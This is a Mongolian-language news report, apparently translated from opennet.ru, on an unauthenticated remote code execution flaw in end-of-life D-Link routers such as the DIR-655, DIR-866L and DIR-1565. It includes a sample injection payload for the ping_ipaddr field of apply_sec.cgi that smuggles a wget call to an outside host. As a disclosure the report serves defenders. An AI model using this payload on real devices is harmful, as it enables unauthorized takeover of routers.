D-Link утасгүй чиглүүлэгчид аюултай эмзэг байдал (), энэ нь танд баталгаажуулалтгүйгээр нэвтрэх боломжтой "ping_test" зохицуулагч руу тусгай хүсэлт илгээх замаар төхөөрөмжийн тал дээр алсаас код гүйцэтгэх боломжийг олгодог.
Сонирхолтой нь, програм хангамж хөгжүүлэгчдийн үзэж байгаагаар "ping_test" дуудлагыг зөвхөн баталгаажуулсны дараа хийх ёстой боловч бодит байдал дээр вэб интерфэйс рүү нэвтрэхээс үл хамааран ямар ч тохиолдолд дуудагддаг. Ялангуяа, apply_sec.cgi скриптэд нэвтэрч, “action=ping_test” параметрийг дамжуулах үед скрипт нь баталгаажуулалтын хуудас руу чиглүүлдэг боловч нэгэн зэрэг ping_test-тэй холбоотой үйлдлийг гүйцэтгэдэг. Кодыг ажиллуулахын тулд өөр нэг эмзэг байдлыг ping_test-д ашигласан бөгөөд энэ нь туршилтанд илгээсэн IP хаягийн зөв эсэхийг зөв шалгахгүйгээр ping хэрэгслийг дууддаг. Жишээлбэл, wget хэрэглүүрийг дуудаж, "echo 1234" командын үр дүнг гадаад хост руу шилжүүлэхийн тулд "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" параметрийг зааж өгөхөд л хангалттай. test.test/?$( echo 1234)".
Дараах загваруудад эмзэг байдал байгаа нь албан ёсоор батлагдсан:
- DIR-655 3.02b05 ба түүнээс дээш програм хангамжтай;
- DIR-866L 1.03b04 ба түүнээс дээш програм хангамжтай;
- DIR-1565 програм хангамж 1.01 ба түүнээс дээш хувилбартай;
- DIR-652 (програм хангамжийн асуудалтай хувилбаруудын талаар мэдээлэл өгөөгүй)
Эдгээр загваруудыг дэмжих хугацаа аль хэдийн дууссан тул D-Link , энэ нь эмзэг байдлыг арилгахын тулд шинэчлэлтүүдийг гаргахгүй бөгөөд тэдгээрийг ашиглахыг зөвлөдөггүй бөгөөд шинэ төхөөрөмжөөр солихыг зөвлөж байна. Аюулгүй байдлын шийдлийн хувьд та вэб интерфэйс рүү нэвтрэх эрхийг зөвхөн итгэмжлэгдсэн IP хаягаар хязгаарлаж болно.
Энэ эмзэг байдал нь бас байсан гэдгийг хожим олж мэдсэн DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 ба DIR-825 загварууд, шинэчлэлтүүдийг гаргахаар төлөвлөж байгаа бөгөөд одоогоор тодорхойгүй байна.
Эх сурвалж: opennet.ru